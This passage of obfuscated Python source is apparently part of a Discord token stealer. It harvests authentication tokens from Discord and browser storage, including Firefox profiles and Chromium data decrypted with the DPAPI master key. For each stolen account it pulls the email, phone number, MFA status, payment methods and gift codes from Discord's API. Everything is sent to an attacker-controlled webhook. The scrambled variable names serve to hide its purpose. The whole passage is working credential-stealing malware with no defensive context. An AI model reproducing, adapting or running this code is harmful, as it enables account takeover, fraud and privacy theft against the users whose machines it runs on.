                                        BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK[LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD] = (OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ, f"{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD in re.findall(JJWOZRRMWMSFNVXNJGQZAJFUYLYDSRLFVSTBZKNGBQJTAQISBSK, v4r_line.strip()):
                                if validate_t0k3n(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD, KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT):
                                    TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE = requests.get(KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT, headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD}).json()['id']
                                    if TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE not in HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ:
                                        FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB.append(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD)
                                        HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ.append(TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE)
                                        BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK[LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD] = (OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ, f"{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}\\{v4r_file_name}")

        if os.path.exists(QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + "\\Mozilla\\Firefox\\Profiles"):
            for DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ, _, v4r_files in os.walk(QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD in re.findall(JJWOZRRMWMSFNVXNJGQZAJFUYLYDSRLFVSTBZKNGBQJTAQISBSK, v4r_line.strip()):
                                    if validate_t0k3n(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD, KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT):
                                        TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE = requests.get(KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT, headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD}).json()['id']
                                        if TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE not in HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ:
                                            FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB.append(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD)
                                            HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ.append(TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE)
                                            BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK[LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD] = ('Firefox', f"{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}\\{v4r__file}")
        return FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB, BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK

    def validate_t0k3n(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD, KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT):
        return requests.get(KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT, headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD}).status_code == 200

    def decrypt_val(SPVKGKBRCOKXPROFWSEKLVJXABZKIJJUEKSDFEPMNWOXRCXIGWSEFDLIIRJLTOGQWVKXAOQWUHZGMQWIZWQTHHRZDPOXK, v4r_master_key):
        v4r_iv = SPVKGKBRCOKXPROFWSEKLVJXABZKIJJUEKSDFEPMNWOXRCXIGWSEFDLIIRJLTOGQWVKXAOQWUHZGMQWIZWQTHHRZDPOXK[3:15]
        v4r_payload = SPVKGKBRCOKXPROFWSEKLVJXABZKIJJUEKSDFEPMNWOXRCXIGWSEFDLIIRJLTOGQWVKXAOQWUHZGMQWIZWQTHHRZDPOXK[15:]
        v4r_cipher = AES.new(v4r_master_key, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ):
        if not os.path.exists(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ):
            return None
        with open(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        v4r_master_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(v4r_master_key, None, None, None, 0)[1]

    def upload_t0k3n5():
        FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB, BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK = extr4ct_t0k3n5()
        IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER = SyncWebhook.from_url(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM)

        if not FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB:
            UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV = Embed(
                title=f'Discord Token `{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC} "{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}"`:', 
                description=f"No discord tokens found.",
                color=DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL)
            UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.set_footer(text=UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC, icon_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
            IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER.send(embed=UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV, username=TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX, avatar_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
            return
        
        for LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD_d15c0rd in FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB:
            LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD_d15c0rd}).json()

            JQTXCBMTLYTNDZEYZPYXMLMRXPZDBDHYCFXSITXNIGJHJSWUYQZMUIDLMHJTYQLXZUONQXAZ = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('username', "None") + '#' + LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('discriminator', "None")
            VMPTTTKVLBMVYRKIPBQXBIIOHXANLVANJGTYNVVCSOLSIASPWOSIALWVHCTRS = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('global_name', "None")
            DFRCVUBXPGQYHGMYCIRWONVVRJKRJARGTSFSUOSTLYFRTYGFDOKMBKGDWTSOHPIVSGPAGDEVJDMS = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('id', "None")
            RQLZICHSZEMCWOTAKNMRMUKBKEWFYFUNIFPZOZMHWOLFXBJHYPQRTAPITNUWJICJLBYYOSKGCQWPKRMBIDXECSZBKIXRIDLS = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('email', "None")
            DZCSJXTPSOUDZHQPLRJGIPTWTESDJXMAGOZYOBKYZDSAQDCBWFYOFGOQHSPDFMMBFQIAIIFVBLJSREKKOFDHUBGOFXJBYIARKQW = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('verified', "None")
            IDYMFYKFYBURQPDDUUWBDAVMEKJRVWIMDCKYBIHJMOTGEAYSTMDHRDNXGRYHIHSMLIBOSQZIPPUHTXU = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('phone', "None")
            FQQKDYMDEOFEGJKFZNMNSRXFJNBUQFPKLJIJVFLKSKOGWZSNWNDZSMHXKKEGUGLDPZYMJQOINAEOEVGFPFCQAGKKBYCVRFS = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('locale', "None")
            ZIPXTZKRMJCJGTQTZUEZHQVJTRNBXYVKVOOBSKJNXHNTCYYHDLNWUMXTJOVFTSJRQDWSNME = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('mfa_enabled', "None")

            try:
                if LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('premium_type', 'None') == 0:
                    ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ = 'False'
                elif LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('premium_type', 'None') == 1:
                    ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ = 'Nitro Classic'
                elif LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('premium_type', 'None') == 2:
                    ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ = 'Nitro Boosts'
                elif LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('premium_type', 'None') == 3:
                    ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ = 'Nitro Basic'
                else:
                    ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ = 'False'
            except:
                ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ = "None"

            try: 
                FFMKAOWJZZXHJQOCVJUMXSTPHNBYXVBTHEGYAVXQWFMZHZFJEXOQVMUWTESKAMRJLGSEYA = f"https://cdn.discordapp.com/avatars/{DFRCVUBXPGQYHGMYCIRWONVVRJKRJARGTSFSUOSTLYFRTYGFDOKMBKGDWTSOHPIVSGPAGDEVJDMS}/{LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{DFRCVUBXPGQYHGMYCIRWONVVRJKRJARGTSFSUOSTLYFRTYGFDOKMBKGDWTSOHPIVSGPAGDEVJDMS}/{LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{DFRCVUBXPGQYHGMYCIRWONVVRJKRJARGTSFSUOSTLYFRTYGFDOKMBKGDWTSOHPIVSGPAGDEVJDMS}/{LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG['avatar']}.png"
            except: 
                FFMKAOWJZZXHJQOCVJUMXSTPHNBYXVBTHEGYAVXQWFMZHZFJEXOQVMUWTESKAMRJLGSEYA = EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ

            try:
                GUHJUERTQFGVEQOIVGZUUYQVPADBXHXMOWAPIJPNJMXCASCGOGPSLYGEPDDYFFJDIKNRBRJAYLNVLGTVTAESJFOEUVVXU = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD_d15c0rd}).json()
                if GUHJUERTQFGVEQOIVGZUUYQVPADBXHXMOWAPIJPNJMXCASCGOGPSLYGEPDDYFFJDIKNRBRJAYLNVLGTVTAESJFOEUVVXU:
                    GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC = []

                    for v4r_method in GUHJUERTQFGVEQOIVGZUUYQVPADBXHXMOWAPIJPNJMXCASCGOGPSLYGEPDDYFFJDIKNRBRJAYLNVLGTVTAESJFOEUVVXU:
                        if v4r_method['type'] == 1:
                            GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC.append('CB')
                        elif v4r_method['type'] == 2:
                            GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC.append("Paypal")
                        else:
                            GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC.append('Other')
                    GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC = ' / '.join(GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC)
                else:
                    GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC = "None"
            except:
                GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC = "None"

            try:
                VSDOSCFGSLEUAXSPNPQGNPVDEQMXYMBXSKQMPIITJICSVFXIZBIP = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD_d15c0rd}).json()
                if VSDOSCFGSLEUAXSPNPQGNPVDEQMXYMBXSKQMPIITJICSVFXIZBIP:
                    ARDFVKISPKHROZUQEYCKNIRCAVXZWHUGSKQMOYSWALJUCRVOBRNANHWNVQDJAJAVZABIBDIMYHTHEFRYUYPKZKKKFYIMQ = []
                    for TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID in VSDOSCFGSLEUAXSPNPQGNPVDEQMXYMBXSKQMPIITJICSVFXIZBIP:
                        OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ = TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID['promotion']['outbound_title']
                        TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID = TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID['code']
                        TYMQJEJRBGSQJQAYOIIXMYZWOQRYBLFFDLDFRFOWWNIHYHDKAWXNEVYILZAK = f"Gift: {OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ}\nCode: {TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID}"
                        if len('\n\n'.join(TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID)) + len(TYMQJEJRBGSQJQAYOIIXMYZWOQRYBLFFDLDFRFOWWNIHYHDKAWXNEVYILZAK) >= 1024:
                            break
                        ARDFVKISPKHROZUQEYCKNIRCAVXZWHUGSKQMOYSWALJUCRVOBRNANHWNVQDJAJAVZABIBDIMYHTHEFRYUYPKZKKKFYIMQ.append(TYMQJEJRBGSQJQAYOIIXMYZWOQRYBLFFDLDFRFOWWNIHYHDKAWXNEVYILZAK)
                    if len(ARDFVKISPKHROZUQEYCKNIRCAVXZWHUGSKQMOYSWALJUCRVOBRNANHWNVQDJAJAVZABIBDIMYHTHEFRYUYPKZKKKFYIMQ) > 0:
                        TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID = '\n\n'.join(ARDFVKISPKHROZUQEYCKNIRCAVXZWHUGSKQMOYSWALJUCRVOBRNANHWNVQDJAJAVZABIBDIMYHTHEFRYUYPKZKKKFYIMQ)
                    else:
                        TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID = "None"
                else:
                    TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID = "None"
            except:
                TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID = "None"
        
            v4r_software_name, DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ = BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK.get(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC} "{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}"`:', color=DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL)      
            embed.add_field(name=":file_folder: Path:", value=f"```{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{JQTXCBMTLYTNDZEYZPYXMLMRXPZDBDHYCFXSITXNIGJHJSWUYQZMUIDLMHJTYQLXZUONQXAZ}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{VMPTTTKVLBMVYRKIPBQXBIIOHXANLVANJGTYNVVCSOLSIASPWOSIALWVHCTRS}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{DFRCVUBXPGQYHGMYCIRWONVVRJKRJARGTSFSUOSTLYFRTYGFDOKMBKGDWTSOHPIVSGPAGDEVJDMS}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{RQLZICHSZEMCWOTAKNMRMUKBKEWFYFUNIFPZOZMHWOLFXBJHYPQRTAPITNUWJICJLBYYOSKGCQWPKRMBIDXECSZBKIXRIDLS}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{DZCSJXTPSOUDZHQPLRJGIPTWTESDJXMAGOZYOBKYZDSAQDCBWFYOFGOQHSPDFMMBFQIAIIFVBLJSREKKOFDHUBGOFXJBYIARKQW}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{IDYMFYKFYBURQPDDUUWBDAVMEKJRVWIMDCKYBIHJMOTGEAYSTMDHRDNXGRYHIHSMLIBOSQZIPPUHTXU}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{ASDDKQXVWGWWDQFTTHHQREONNPTVJKAGFVBESHRVLZGSAFWAMPZ}```", inline=True)
            embed.add_field(name=":earth_africa: Language:", value=f"```{FQQKDYMDEOFEGJKFZNMNSRXFJNBUQFPKLJIJVFLKSKOGWZSNWNDZSMHXKKEGUGLDPZYMJQOINAEOEVGFPFCQAGKKBYCVRFS}```", inline=True)
            embed.add_field(name=":moneybag: Billing:", value=f"```{GCPDGIBRVYLSACBFSCLZBYDRANLZRTNJILRDPHWUGEWPRPOTXWVDZBGSWC}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{TIBROHOYORNBSNCDGSLNHOASLGCOLQNCYDVLUWLUAWQDIWTDBKSCTRFZBPCUJYDOUGAID}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{ZIPXTZKRMJCJGTQTZUEZHQVJTRNBXYVKVOOBSKJNXHNTCYYHDLNWUMXTJOVFTSJRQDWSNME}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=FFMKAOWJZZXHJQOCVJUMXSTPHNBYXVBTHEGYAVXQWFMZHZFJEXOQVMUWTESKAMRJLGSEYA)
            embed.set_footer(text=UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC, icon_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
            IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER.send(embed=embed, username=TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX, avatar_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)

    upload_t0k3n5()

